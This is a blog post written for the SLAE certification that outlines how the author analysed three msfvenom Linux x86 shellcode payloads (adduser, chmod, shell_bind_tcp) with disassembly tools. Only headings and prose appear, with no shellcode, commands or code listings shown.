by

Disecting Msfvenom Shellcode | Linux x86

Introduction

 In this post, we will analyze three samples of Linux x86 based shellcode generated by msfvenom using different tools. Now before going into the next section here’s the list of what is available to us.

Shellcode I

The first shellcode we’ll look at is adduser, the following are the options that needs to be feed into the payload

Generating shellcode

Compile and test

Use Ndisasm to dump assembly code

Analyze code line by line using the comments section

syscall reference setreuid(), open(), write(), exit()

Shellcode II

The second shellcode we’re going to look at is chmod, the following are the options that needs to be feed into the payload

Generating shellcode using default options

Compile and test

Use GDB with peda to dump assembly code

Analyze code line by line using the comments section

syscall reference chmod() and exit()

Shellcode III

The third and last shellcode we’re going to dissect is shell_bind_tcp, let’s check payload options

Generating shellcode

Compile and test

Use libemu to dump assembly code

Analyze code line by line using the comments section

syscall reference socketcall()dup2(), and execute()

Closing Thoughts

Stepping through msfvenom shellcode taught me few behind the scene tricks, also it cleared my doubts as far as how some of the commands work. Hope you learned something too! Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID:    SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%2015

 

Leave a Reply

Your email address will not be published. Required fields are marked *